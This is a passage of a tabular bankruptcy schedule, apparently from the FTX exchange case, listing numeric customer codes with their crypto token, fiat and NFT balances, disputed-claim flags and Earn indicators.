| 07319978 | | BRZ[2], CUSDT[7], TRX[8], USD[0.00] | | |
| 07319979 | | USD[10.00] | | |
| 07319980 | | USD[10.00] | | |
| 07319981 | | CUSDT[3], DOGE[4.95563135], LINK[4.90567775], USD[0.01] | Yes | |
| 07319982 | | ETH[.00600787], ETHW[.0593947], USD[0.00] | Yes | |
| 07319983 | | USD[10.00] | | |
| 07319984 | | ETH[.00062182], ETHW[.00062182], USD[0.00] | | |
| 07319986 | | USD[10.00] | | |
| 07319987 | | USD[12.30] | | |
| 07319988 | | USD[10.00] | | |
| 07319990 | | BRZ[2], CUSDT[1], USD[0.98] | Yes | |
| 07319991 | | BRZ[1], CUSDT[1], DOGE[7582.99373688], USD[0.00] | | |
| 07319992 | | ETH[0.58500904], ETHW[0.58476340], USD[0.00] | Yes | |
| 07319994 | | BAT[1], BRZ[3], BTC[.14464677], CUSDT[1], DOGE[2], ETH[2.02879439], ETHW[2.02794231], LINK[102.04902907], SHIB[50], SOL[22.64149512], SUSHI[0], TRX[4], USD[0.00], USDT[0.35770134] | Yes | |
| 07319995 | | USD[10.00] | | |
| 07319997 | | BAT[1], CUSDT[1], ETH[0], LINK[0], TRX[1], USD[10.00] | | |
| 07319998 | | BTC[.00180996], CUSDT[1], TRX[2], USD[0.01] | | |
| 07320001 | | BRZ[1], DOGE[2750.70695888], ETH[.04374434], ETHW[.04319853], USD[10.92] | Yes | |
| 07320002 | | BAT[2], CUSDT[5], TRX[2], USD[0.77] | | |
| 07320005 | | USD[10.00] | | |
| 07320006 | | USD[0.00] | Yes | |
| 07320007 | | BRZ[3], CUSDT[1], DOGE[2933.99699434], GRT[1], TRX[5], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07320009 | | DOGE[3058.119], USD[0.30], USDT[0] | | |
| 07320010 | | USD[0.00] | Yes | |
| 07320011 | | USD[10.00] | | |
| 07320012 | | BTC[1.28134694], ETH[0.00096120], USD[588.06], USDT[0.00000002] | | |
| 07320013 | | BRZ[2], CUSDT[12], DOGE[1], GRT[1], LTC[.01932545], TRX[7], USD[0.00], USDT[2] | | |
| 07320015 | | BAT[3], BRZ[5], CUSDT[15], TRX[1], USD[0.01], USDT[2] | | |
| 07320018 | | CUSDT[1], USD[88.73] | | |
| 07320020 | | USD[10.00] | | |
| 07320021 | | NFT (295392915221881756/Coachella x FTX Weekend 2 #29806)[1], USD[10.00] | | |
| 07320022 | | CUSDT[2], DOGE[4.05213569], ETH[0], ETHW[0], GRT[3.08441019], LTC[.01200577], TRX[2], UNI[.0272408], USD[0.00] | Yes | |
| 07320023 | | USD[10.00] | | |
| 07320024 | | CUSDT[1], DOGE[0], USD[0.00] | Yes | |
| 07320025 | | SOL[.78492852], USD[0.00] | | |
| 07320026 | | BF_POINT[300], BTC[.00001067], DOGE[.00006879], ETH[.00007315], ETHW[.00007315], TRX[127.62788182], USD[0.00], USDT[1.07271810] | Yes | |
| 07320027 | | USD[0.00] | | |
| 07320028 | | USD[0.00] | | |
| 07320029 | | BCH[0], DOGE[0], MATIC[27.09419456], SHIB[7], SOL[0], SUSHI[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07320030 | | BTC[0], DOGE[0], USD[0.00], USDT[0] | | |
| 07320031 | | USD[0.00], USDT[0] | | |
| 07320032 | | BRZ[8.10199876], CUSDT[77.74130159], DOGE[38.64966377], ETHW[.90146963], GRT[3.05499909], TRX[22.28578679], USD[0.00], USDT[2.03989022] | Yes | |
| 07320033 | | BTC[0], ETH[0], SOL[0], USD[311.47], USDT[0] | | |
| 07320035 | | DOGE[.733], USD[0.61] | | |
| 07320039 | | BRZ[1], BTC[.00171407], CUSDT[2], DOGE[1941.06814027], TRX[2], USD[0.00] | | |
| 07320040 | | BRZ[2], BTC[0], CUSDT[2], ETH[0], TRX[1], USD[0.05] | | |
| 07320042 | | USD[10.00] | | |
| 07320043 | | BTC[.00021458], CUSDT[9], TRX[1], USD[0.00], USDT[0] | | |
| 07320045 | | USD[0.00] | | |
| 07320046 | | CUSDT[240.25837559], DOGE[1.92749753], USD[0.00] | | |
| 07320047 | | DOGE[1.24570185], USD[0.00] | | |
| 07320049 | | BAT[1], BF_POINT[300], CUSDT[10], DOGE[2], ETH[0.00000051], ETHW[0.03135880], MATIC[.00044197], SHIB[25], SOL[.00000001], USD[0.00], USDT[0] | Yes | |
| 07320051 | | USD[10.00] | | |
| 07320052 | | DOGE[0], KSHIB[0], SHIB[0] | | |
| 07320053 | | BAT[1.01655549], BRZ[8.84709769], BTC[.00000059], CUSDT[53.08258541], DOGE[2.00000314], SOL[8.50831002], TRX[186.67249132], USD[0.00], USDT[2.21177443] | Yes | |
| 07320055 | | USD[10.00] | | |
| 07320056 | | CUSDT[1], TRX[2], USD[0.01] | | |
| 07320058 | | GRT[10.71271522], NFT (417224155791426785/Aku World Avatar #156)[1], NFT (524559210772611520/Aku World: Dream #216)[1], TRX[1], USD[0.00] | Yes | |
| 07320060 | | DOGE[0.62575440], USD[0.25] | | |
| 07320061 | | BRZ[0], DOGE[0], USD[0.00] | Yes | |
| 07320062 | | USD[10.00] | | |
| 07320063 | | USD[10.00] | | |
| 07320065 | | DOGE[82.488], USD[0.03] | | |
| 07320066 | | DOGE[0], UNI[0], USD[0.00] | | |
| 07320067 | | CUSDT[2], USD[0.00], YFI[.00041912] | Yes | |
| 07320068 | | BRZ[2], CUSDT[1], DOGE[.64477622], TRX[3], USD[0.22] | | |
| 07320070 | | USD[10.00] | | |
| 07320071 | | CUSDT[2], DOGE[1.00003054], TRX[1], USD[0.00] | | |
| 07320073 | | USD[10.00] | | |
| 07320074 | | NFT (304393528825621570/Kiddo #3056)[1], NFT (349787569195741971/DOTB #3302)[1], NFT (371744686772820753/Sollama)[1], NFT (384935634756619908/Mech #5892)[1], NFT (489262393397318430/Solana Penguin #6571)[1], NFT (492373858103561468/Braelin, the Delightful)[1], NFT (494089421541196153/Eitbit Ape #210)[1], NFT (504375851636442828/SOLYETIS #7811)[1], NFT (505934338943567703/Eitbit Ape #3931)[1], USD[0.00], USDT[0] | | |
| 07320075 | | USD[10.00] | | |
| 07320076 | | BTC[.00000001], CUSDT[43], DOGE[3], TRX[7], USD[0.01] | Yes | |
| 07320078 | | USD[10.00] | | |
| 07320080 | | USD[10.00] | | |
| 07320082 | | USD[71.78] | | |
| 07320083 | | CUSDT[23.73238277], USD[0.00] | Yes | |
| 07320084 | | DOGE[3163.21245085], ETH[.00126909], ETHW[.00126909], LINK[2.07279978], TRX[3504.97361988], USD[0.01] | | |
| 07320086 | | USD[10.00] | | |
| 07320088 | | GRT[3.66431959], USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07320089 | | NFT (43745415808079196/Humpty Dumpty #701)[1], USD[10.00] | | |
| 07320090 | | DOGE[4.01247598], SOL[.76131583], USD[0.00] | Yes | |
| 07320091 | | BTC[0], DOGE[1], USD[10.03] | | |
| 07320094 | | USD[10.00] | | |
| 07320095 | | BRZ[1], CUSDT[5], DOGE[1], GRT[1], TRX[2], USD[0.00] | | |
| 07320096 | | DOGE[0.14112878], USD[0.00], USDT[0] | | |
| 07320097 | | BAT[1], BRZ[2], CUSDT[5], DOGE[24454.04939771], GRT[1.00367791], NFT (44434988598581527/Imola Ticket Stub #1054)[1], NFT (54833665362521573/Entrance Voucher #2634)[1], SOL[21.2945806], TRX[3], USD[0.00], USDT[1.11043116] | Yes | |
| 07320098 | | CUSDT[1], DOGE[0], USD[0.00] | Yes | |
| 07320108 | | BTC[.00155952], TRX[1], USD[0.00] | Yes | |
| 07320111 | | BTC[0], DOGE[0], ETH[0], SHIB[11.13635904], SOL[0], USD[0.00] | Yes | |
| 07320112 | | BRZ[1], CUSDT[1], DOGE[3.40322999], TRX[.00284077], USD[0.12] | | |
| 07320113 | | DOGE[0] | | |
| 07320114 | | USD[10.00] | | |
| 07320115 | | BAT[18.75522649], USD[0.00] | | |
| 07320118 | | USD[10.00] | | |
| 07320119 | | CUSDT[4], TRX[1], USD[0.79] | | |
| 07320120 | | BCH[.00002057], USD[9.51] | | |
| 07320121 | | BTC[.00129364], DOGE[4], ETH[0], ETHW[0.14225995], LINK[.01597767], SHIB[99094.31424646], TRX[4], USD[3000.00] | Yes | |
| 07320122 | | BRZ[1], DOGE[3], SHIB[6], SOL[.0000404], TRX[1], USD[0.01], USDT[0.00181956] | Yes | |
| 07320123 | | DOGE[3329.229], ETH[.007], ETHW[.007], USD[0.59] | | |
| 07320127 | | BAT[1], CUSDT[3], DOGE[3], ETH[0.00000001], ETHW[0], SOL[0], TRX[1], USD[0.00], USDT[1] | | |
| 07320129 | | BRZ[1], CUSDT[2], DOGE[1], GRT[1], TRX[1], USD[10.00], USDT[1] | | |
| 07320131 | | BTC[0], DOGE[0], ETH[.00000014], ETHW[.00000014], USD[0.00] | | |
| 07320133 | | USD[10.79] | | |
| 07320134 | | USD[0.00] | Yes | |
| 07320135 | | USD[10.00] | | |
| 07320137 | | BRZ[3], TRX[1], USD[0.00] | | |
| 07320138 | | BTC[.00440814], CUSDT[2], DOGE[199.73468027], ETH[.24130206], ETHW[.24130206], LINK[2.57226452], TRX[1], USD[0.77] | | |
| 07320139 | | USD[0.00] | | |
| 07320145 | | DOGE[1], USD[0.00] | | |
| 07320147 | | USD[10.00] | | |
| 07320149 | | USD[10.00] | | |
| 07320152 | | CUSDT[1], USD[5.46] | | |
| 07320153 | | CUSDT[.00099818], ETH[.00013271], ETHW[18.12688494], USD[0.00], USDT[0.00000748] | Yes | |
| 07320154 | | BAT[0], BTC[0], ETH[0], ETHW[0], USD[0.00] | | |
| 07320155 | | CUSDT[1], DOGE[113.75126574], TRX[1], USD[0.01] | | |
| 07320156 | | USD[10.00] | | |
| 07320157 | | USD[10.00] | | |
| 07320158 | | CUSDT[0], SOL[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07320159 | | USD[10.00] | | |
| 07320160 | | ETHW[.56569451], USD[5310.40] | Yes | |
| 07320161 | | USD[0.00] | | |
| 07320162 | | CUSDT[18], DOGE[1], TRX[4], USD[0.01] | Yes | |
| 07320167 | | USD[10.00] | | |
| 07320169 | | USD[10.00] | | |
| 07320170 | | CUSDT[1], DOGE[1], TRX[2], USD[0.01] | | |
| 07320172 | | BRZ[1], CUSDT[2], DOGE[1], ETH[0], NFT (47654649117721612/8FTX - Off The Grid Miami #1300)[1], TRX[1], USD[0.01] | Yes | |
| 07320173 | | BRZ[1], CUSDT[5], DOGE[0], GRT[2], SHIB[1], TRX[1], USD[0.01] | | |
| 07320174 | | DOGE[1990.008], USD[0.01] | | |
| 07320175 | | BTC[0], SOL[.00498], UNI[.01454111], USD[0.00] | | |
| 07320176 | | CUSDT[1], USD[0.00] | | |
| 07320178 | | USD[10.00] | | |
| 07320180 | | USD[10.00] | | |
| 07320181 | | CUSDT[1], NFT (36623037049880647/6Humpty Dumpty #573)[1], NFT (42822872390775968/3Romeo #1128)[1], NFT (51752939307698908/1Saudi Arabia Ticket Stub #2109)[1], NFT (54277450183510578/0Entrance Voucher #3644)[1], SUSHI[.88782901], USD[0.00] | Yes | |
| 07320182 | | BAT[15.63814912], CUSDT[1828.01166723], DOGE[2506.22252494], ETH[.19928329], ETHW[.19907399], GRT[21.22014993], KSHIB[223.47981764], SHIB[241016.18226345], SUSHI[10.84837296], TRX[906.51151515], USD[0.00], USDT[12.08800818] | Yes | |
| 07320183 | | USD[10.00] | | |
| 07320184 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07320188 | | NFT (31290836186483333379/Humpty Dumpty #408)[1], USD[10.91] | Yes | |
| 07320191 | | BTC[0], DOGE[0], ETH[0], USD[77.39] | | |
| 07320192 | | BRZ[2], DOGE[2466.21666001], TRX[1], USD[0.00] | | |
| 07320193 | | USD[10.00] | | |
| 07320194 | | USD[10.00] | | |
| 07320196 | | SHIB[188285.67574018], USD[0.00] | Yes | |
| 07320198 | | BF_POINT[300], BRZ[1], DOGE[2.00085195], ETH[.00001594], NFT (354724395868639420/Coachella x FTX Weekend 1 #833)[1], NFT (394661668597523045/FTX - Off The Grid Miami #1787)[1], SOL[0.00000001], TRX[5], USD[0.00], USDT[0.00000027] | Yes | |
| 07320199 | | USD[10.00] | | |
| 07320200 | | BTC[0.00001482], SOL[1.02681329], USD[0.04] | | |
| 07320202 | | DOGE[127.86783839], USD[0.08] | | |
| 07320203 | | USD[0.00] | | |
| 07320204 | | NFT (541269590384864571/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #62)[1], NFT (560132190535100165/Doak Walker's Playbook: SMU vs. Santa Clara - September 27, 1947 #52)[1], USD[1.53] | Yes | |
| 07320205 | | CUSDT[1], DOGE[225.49461844], GRT[1.00404471], TRX[1501.17132056], USD[0.00] | Yes | |
| 07320210 | | USD[50.90] | | |
| 07320212 | | USD[10.00] | | |
| 07320213 | | BCH[.20085812], CUSDT[1], DOGE[1098.69848985], ETH[.02655221], ETHW[.02655221], SHIB[4], TRX[207.73882571], USD[0.00] | | |
| 07320214 | | ALGO[.0095254], BRZ[2], BTC[.00000002], DOGE[10.02267403], GRT[2430.85815261], LINK[0], SHIB[55], SOL[9.45488169], TRX[5], USD[0.00] | Yes | |
| 07320216 | | USD[10.00] | | |
| 07320217 | | BRZ[0], BTC[0], DOGE[1], USD[10.00], USDT[1] | | |
| 07320218 | | USD[10.00] | | |
| 07320220 | | USD[10.00] | | |
| 07320222 | | DOGE[.324], USD[0.00] | | |
| 07320223 | | USD[10.00] | | |
| 07320224 | | ETH[.00580809], ETHW[.00573969], USD[0.00] | Yes | |
| 07320225 | | ALGO[0], BAT[1.01042938], BRZ[2], BTC[0], CUSDT[4], DOGE[22.26266034], SHIB[2], SOL[0], TRX[2], USD[259.04], USDT[1.06289819] | Yes | |
| 07320226 | | USD[10.00] | | |
| 07320227 | | ETH[0], SHIB[7], USD[0.00] | Yes | |
| 07320228 | | DOGE[2493.984], USD[0.00] | | |
| 07320230 | | BTC[0], CUSDT[5], DOGE[1], SHIB[2], TRX[1], USD[0.00] | Yes | |
| 07320231 | | USD[10.00] | | |
| 07320232 | | USD[10.00] | | |
| 07320235 | | DOGE[1446.08464431], USD[0.02] | | |
| 07320236 | | CUSDT[0], DOGE[0], ETH[0], UNI[0], USD[0.01], USDT[0] | | |
| 07320237 | | USD[10.00] | | |
| 07320238 | | USD[10.00] | | |
| 07320239 | | BAT[2.10043564], CUSDT[45.00246581], DOGE[4.01886773], ETH[3.8699486], ETHW[3.86832321], GRT[1.0031359], SHIB[7102.0796448], TRX[6], USD[4665.25], USDT[2.2133965] | Yes | |
| 07320240 | | BRZ[2], GRT[1], USD[0.01] | | |
| 07320241 | | USD[10.00] | | |
| 07320242 | | BTC[0.00343580], DOGE[0] | | |
| 07320243 | | BAT[2.13029617], BRZ[7.76393707], BTC[.00273446], CUSDT[2], DOGE[2], ETH[0], GRT[2.08352305], SOL[0], TRX[8.00087675], USD[538.27] | Yes | |
| 07320245 | | USD[10.00] | | |
| 07320246 | | BTC[0], DOGE[1], USD[0.01] | | |
| 07320247 | | DOGE[1031.23730863], SHIB[726297.61993498], SOL[1.88719107], USD[0.34] | | |
| 07320248 | | BTC[0], DOGE[0], ETH[0], ETHW[0], GRT[0], SOL[0], UNI[0], USD[0.00], USDT[0] | | |
| 07320249 | | DOGE[0], ETH[0], USD[0.00], USDT[0.00000594] | | |
| 07320250 | | USD[10.00] | | |
| 07320252 | | USD[10.00] | | |
| 07320253 | | USD[10.00] | | |
| 07320254 | | BRZ[3], CUSDT[15], DOGE[1], TRX[3], USD[0.01] | Yes | |
| 07320256 | | USD[0.00] | Yes | |
| 07320257 | | USD[10.00] | | |
| 07320259 | | CUSDT[2], DOGE[1], ETH[.00560142], ETHW[.00560142], TRX[1], USD[0.01] | | |
| 07320261 | | USD[10.00] | | |
| 07320263 | | AAVE[12.82064836], ETHW[1043.08753391], SOL[.00283634], SUSHI[50.37359186], UNI[200.88206409], USD[0.22] | Yes | |
| 07320265 | | USD[10.00] | | |
| 07320266 | | DOGE[2081.77056579] | | |
| 07320267 | | DOGE[617.98458874], USD[0.00] | | |
| 07320268 | | DOGE[.924], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07320269 | | DOGE[.926], SOL[.0504] | | |
| 07320270 | | USD[10.00] | | |
| 07320271 | | USD[0.00] | | |
| 07320272 | | USD[10.00] | | |
| 07320273 | | USD[10.00] | | |
| 07320274 | | USD[0.21], USDT[0.00000001] | | |
| 07320276 | | DOGE[.19108691], USD[0.00] | | |
| 07320277 | | BRZ[1], ETC[.007700963], CUSDT[6], DOGE[1257.49550255], ETH[.04566018], ETHW[.04509412], LTC[.45360036], USD[0.00] | Yes | |
| 07320278 | | ETH[.00288234], ETHW[.00288234], USD[0.00] | | |
| 07320279 | | BRZ[2], CUSDT[1], GRT[1], SHIB[2], TRX[1], USD[0.83], USDT[0] | Yes | |
| 07320280 | | BRZ[1], CUSDT[24], DOGE[3.000548], TRX[2], USD[0.00] | Yes | |
| 07320281 | | DOGE[.07230558], USD[0.00], USDT[0.00000001] | Yes | |
| 07320282 | | DOGE[3585.6], LTC[.23013846], USD[0.00] | | |
| 07320283 | | BAT[2255.86518489], DOGE[1], GRT[1], MATIC[172.09554507], SHIB[1699536.6888273], SUSHI[245.84754926], TRX[13751.62054278], USD[0.00], USDT[0] | Yes | |
| 07320284 | | USD[0.01] | | |
| 07320285 | | CUSDT[1], USD[0.01] | | |
| 07320287 | | BCH[.000846], BTC[.00003649], DOGE[.7618], LTC[.00472], SOL[.023], TRX[.0816], USD[0.00] | | |
| 07320288 | | BTC[0], DOGE[949.30363702], USD[0.00] | | |
| 07320289 | | DOGE[1], USD[0.00] | | |
| 07320290 | | CUSDT[2], DOGE[191.21439473], USD[0.00] | | |
| 07320294 | | CUSDT[1], USD[7.85] | | |
| 07320295 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07320296 | | CUSDT[2], USD[0.01] | | |
| 07320299 | | DOGE[.736], USD[49.49] | | |
| 07320300 | | USD[10.00] | | |
| 07320301 | | BAT[1.0165555], BTC[.0000002], CUSDT[1], DOGE[1], ETH[0], ETHW[0], GRT[1.02475076], LTC[0], SOL[0.00016009], SUSHI[0], TRX[0.06956185], USD[0.00], USDT[1.09199765] | Yes | |
| 07320304 | | DOGE[.00579265], ETH[.337], ETHW[.337], USD[4.52] | | |
| 07320306 | | GRT[4.32817421], USD[0.00] | Yes | |
| 07320307 | | BRZ[1], DOGE[1.73179552], TRX[.57439624], USD[0.00] | | |
| 07320308 | | USD[11.05] | Yes | |
| 07320309 | | BTC[.00018505], CUSDT[7], DOGE[57.7468955], ETH[.00709342], ETHW[.00701134], MATIC[16.75311108], USD[108.41] | Yes | |
| 07320311 | | USD[500.00] | | |
| 07320312 | | DOGE[1.0628331], USD[0.00] | | |
| 07320315 | | GRT[1], LINK[0], USD[10.00] | | |
| 07320318 | | DOGE[1], ETHW[.30946125], SHIB[9], TRX[1], USD[0.00] | | |
| 07320320 | | DOGE[0], ETH[.003], ETHW[.003], USD[3.84] | | |
| 07320322 | | CUSDT[1], SOL[.87775459], USD[0.00] | | |
| 07320323 | | BAT[1], BRZ[1], BTC[.01350944], CUSDT[2], DOGE[1570.52308057], ETH[.57943759], ETHW[.57943759], TRX[6], USD[0.00], USDT[2] | | |
| 07320325 | | USD[10.00] | | |
| 07320327 | | DOGE[3001.548], USD[0.02] | | |
| 07320328 | | USD[10.00] | | |
| 07320330 | | DOGE[0], USD[0.08], USDT[0] | | |
| 07320331 | | DOGE[.987], SOL[.64935], SUSHI[.4995], USD[2.56] | | |
| 07320332 | | BTC[0], DOGE[.03706022], USD[0.00] | | |
| 07320334 | | BTC[0], DOGE[.47706422], USD[0.98] | | |
| 07320335 | | DOGE[4300.393], ETH[.532], ETHW[.532], USD[149.41], USDT[.006618] | | |
| 07320337 | | USD[10.00] | | |
| 07320338 | | BRZ[1], CUSDT[12], DOGE[.00332097], ETH[.00000009], ETHW[0.00000008], SHIB[815565.76103048], TRX[322.06010853], USD[0.00] | Yes | |
| 07320340 | | USD[10.00] | | |
| 07320345 | | BTC[0], DOGE[0], ETH[0], ETHW[0], LINK[10.41995808], LTC[0], SOL[1.03822722], TRX[0], USD[0.01] | Yes | |
| 07320346 | | CUSDT[1], USD[1310.00] | | |
| 07320347 | | USD[0.00] | | |
| 07320348 | | BTC[0], ETH[0] | | |
| 07320349 | | DOGE[0] | | |
| 07320352 | | DOGE[253.348], MATIC[10], SHIB[2240076.72607822], USD[0.05] | | |
| 07320353 | | DOGE[2019.90140535], ETH[.00546422], ETHW[.00546422], TRX[645.76560193], USD[0.00] | | |
| 07320354 | | DOGE[.64], USD[188.11] | | |
| 07320355 | Contingent, Disputed | DOGE[0], ETH[0], SHIB[2], SOL[0.05891360], SUSHI[0], USD[0.00], USDT[0.00000054] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07320357 | | DOGE[122.26112163], USD[0.00] | | |
| 07320359 | | USD[0.00], USDT[1] | | |
| 07320360 | | BTC[.00019695], CUSDT[2], DOGE[77.62685834], ETH[.01244067], ETHW[.01244067], TRX[2], USD[200.16] | | |
| 07320361 | | USD[10.00] | | |
| 07320363 | | CUSDT[1], USD[0.00], USDT[0] | | |
| 07320365 | Contingent, Disputed | USD[10.00] | | |
| 07320366 | | DAI[16.21701680], USD[0.10] | | |
| 07320367 | | USD[10.00] | | |
| 07320368 | | CUSDT[1], DOGE[2712.86090036], USD[210.00] | | |
| 07320370 | | BTC[0], DOGE[0.00154487], USD[0.00] | | |
| 07320372 | | UNI[.46999873], USD[0.00] | Yes | |
| 07320375 | | DOGE[1581.47445574], TRX[2], USD[10.87] | Yes | |
| 07320377 | | CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07320379 | | BTC[0], GRT[0], USD[0.00] | | |
| 07320380 | | USD[10.00] | | |
| 07320387 | | DOGE[0], ETH[0.00449302], ETHW[0.00449302], USD[0.00] | | |
| 07320388 | | USD[10.00] | | |
| 07320390 | | USD[10.00] | | |
| 07320393 | | USD[10.00] | | |
| 07320394 | | DOGE[108.50446864], ETH[.000207], ETHW[.000207], USD[0.79] | | |
| 07320395 | | DOGE[262.335], USD[0.01] | | |
| 07320397 | | USD[10.00] | | |
| 07320400 | | BAT[236.42341308], CUSDT[2], DOGE[0.00001616], TRX[1], USD[0.67] | | |
| 07320402 | | USD[10.00] | | |
| 07320403 | | BRZ[1], BTC[.00668583], CUSDT[1], ETH[0.14953361], ETHW[0.14953361], TRX[1], USD[1.96] | | |
| 07320404 | | BTC[0.00012719], DOGE[0], USD[0.00] | | |
| 07320405 | | ALGO[.44806742], AVAX[.00855172], BAT[1.0002739], BTC[.00000024], CUSDT[19], DOGE[.55772462], ETH[0], GRT[1.00407747], KSHIB[1190.38406867], LINK[.00342613], MATIC[.75613242], NEAR[.0078852], SHIB[7], TRX[5], USD[0.51], USDT[0.00000001] | Yes | |
| 07320408 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07320409 | | BAT[2.00110748], BRZ[2], CUSDT[2], DOGE[4], LTC[121.18025754], MATIC[1428.08385638], SHIB[20113100.82173033], TRX[69565.83117686], USD[10.48] | Yes | |
| 07320410 | | USD[10.00] | | |
| 07320413 | | DOGE[0.73102477], USD[0.00] | | |
| 07320416 | | BRZ[3], BTC[.01068208], CUSDT[2], DOGE[778.4908256], TRX[2], USD[0.31] | | |
| 07320417 | | USD[10.00] | | |
| 07320419 | | BTC[0], DOGE[0], ETH[.00000001], TRX[.000002], USD[0.00], USDT[.009013] | | |
| 07320422 | | BTC[0.00650247], DOGE[1200.96237432], NFT (437415895036069245/Crypto Dogz #8)[1], USD[0.00] | Yes | |
| 07320423 | | BTC[.0455172], DOGE[14477.508], SUSHI[58.266], USD[1000.41] | | |
| 07320426 | | USD[10.00] | | |
| 07320427 | | BTC[.00057256], DOGE[2.00009236], USD[10.00] | | |
| 07320428 | | GRT[0], TRX[17], USD[0.01], USDT[0] | | |
| 07320429 | | USD[10.00] | | |
| 07320430 | | USD[10.00] | | |
| 07320433 | | DOGE[15.53343621], USD[0.00] | | |
| 07320434 | | USD[10.00] | | |
| 07320435 | | CUSDT[11], DOGE[1.00919788], SOL[.00000095], TRX[2], USD[0.00] | Yes | |
| 07320437 | | TRX[77.51174975], USD[0.00] | | |
| 07320438 | | USD[10.00] | | |
| 07320441 | | CUSDT[2], DOGE[1], ETH[.02384675], ETHW[.02384675], TRX[1], USD[0.00] | | |
| 07320443 | | USD[10.00] | | |
| 07320445 | | BRZ[1], CUSDT[5], DOGE[2125.56615113], LTC[3.30054946], USD[0.01] | | |
| 07320446 | | BRZ[1], CUSDT[2], TRX[2], USD[0.00] | Yes | |
| 07320447 | | USD[10.00] | | |
| 07320448 | | SUSHI[0] | | |
| 07320452 | | BTC[.0000946], ETH[.00042], ETHW[.00042], USD[0.01] | | |
| 07320453 | | USD[10.00] | | |
| 07320455 | | BRZ[1], BTC[.00641618], CUSDT[2], DOGE[520.16729065], ETH[.02700398], ETHW[.02700398], LINK[4.66005562], MATIC[82.16831895], SHIB[2490670.0249066], SUSHI[35.14730325], TRX[3], UNI[5.82560865], USD[99.00] | | |
| 07320456 | | BRZ[3], CUSDT[2], DOGE[3.48650184], GRT[.68563767], TRX[2], USD[0.01] | | |
| 07320458 | | DOGE[188.06102128], USD[0.00] | | |
| 07320462 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07320463 | | USD[7.39] | | |
| 07320464 | | USD[10.00] | | |
| 07320467 | | USD[6.43] | | |
| 07320468 | | CUSDT[1], DOGE[6702.7030795], USD[10.00] | | |
| 07320470 | | BTC[0], DOGE[0], SUSHI[0], USD[0.00] | | |
| 07320471 | | DOGE[108.53055318], USD[0.00] | Yes | |
| 07320472 | | USD[0.01] | | |
| 07320473 | | AVAX[.00000565], BF_POINT[100], BRZ[1], BTC[0], CUSDT[11], ETH[0], ETHW[0], MATIC[.00049164], SHIB[6], SOL[0.00000738], TRX[4], UNI[0], USD[0.00] | Yes | |
| 07320475 | | BTC[.00054888], CUSDT[3], DOGE[1.00067123], SOL[.15282298], TRX[1], USD[0.01] | | |
| 07320476 | | USD[10.00] | | |
| 07320477 | | USD[10.00] | | |
| 07320478 | | BRZ[1], CUSDT[2], DOGE[.6043151], TRX[209.57814792], USD[79.88] | Yes | |
| 07320479 | | USD[10.00] | | |
| 07320482 | | BTC[0], DOGE[0], USD[0.74] | | |
| 07320483 | | GRT[22.908], SOL[.05638401], USDT[0.77673194] | | |
| 07320484 | | DOGE[.905], USD[4.82], USDT[0.00000001] | | |
| 07320487 | | BRZ[2], CUSDT[2], DOGE[2], TRX[1], USD[0.00] | | |
| 07320488 | | USD[10.00] | | |
| 07320490 | | USD[5.62] | | |
| 07320491 | | USD[10.00] | | |
| 07320492 | | USD[10.00] | | |
| 07320493 | | BTC[.00009112], CUSDT[1], DOGE[1], ETH[.00227692], ETHW[.00227692], SOL[.64697051], USD[5.00], USDT[1.97825729] | | |
| 07320494 | | CUSDT[1], USD[0.40] | | |
| 07320495 | | BTC[.00003008], DOGE[.258], ETH[0.00042552], ETHW[0.00042552], GRT[0.44249021], MATIC[9.99], SOL[.00584], SUSHI[.064], USD[8.56], USDT[0] | | |
| 07320496 | | CUSDT[1], DOGE[1], USD[22.36], USDT[0.00002342] | Yes | |
| 07320497 | | USD[10.00] | | |
| 07320499 | | USD[10.00] | | |
| 07320501 | | USD[10.00] | | |
| 07320502 | | CUSDT[8], USD[0.00], USDT[0] | | |
| 07320504 | | BRZ[4], CUSDT[14], DAI[4.954705566], DOGE[805.04927072], GRT[2], LTC[.00000145], SOL[.99183121], SUSHI[1.11361437], TRX[103.63960206], USD[0.79], USDT[0.02356754] | | |
| 07320505 | | DOGE[1041.65026156], USD[0.00] | | |
| 07320506 | | BCH[0], BTC[0], DOGE[0], ETH[0] | | |
| 07320507 | | BTC[.00019112], USD[0.00] | | |
| 07320508 | | CUSDT[2], DOGE[.00004114], USD[0.00] | | |
| 07320509 | | NFT [295181761128194713/Shaq's Fun House Commemorative Ticket #178][1], USD[0.44] | | |
| 07320510 | | BTC[0], DOGE[0], ETH[0], LTC[0], USD[0.00], USDT[0] | | |
| 07320511 | | CUSDT[6], DOGE[3762.49080263], ETH[.00000004], ETHW[.00000004], GRT[.0060644], SHIB[1], USD[0.91] | Yes | |
| 07320512 | | USD[10.00] | | |
| 07320513 | | DOGE[29335.322], USD[0.34] | | |
| 07320514 | | USD[10.00] | | |
| 07320515 | | USD[10.00] | | |
| 07320516 | | CUSDT[2], DOGE[1], GRT[2.01753549], TRX[2], USD[0.00] | Yes | |
| 07320517 | | BRZ[1], CUSDT[3], DOGE[0], TRX[1], USD[0.01] | | |
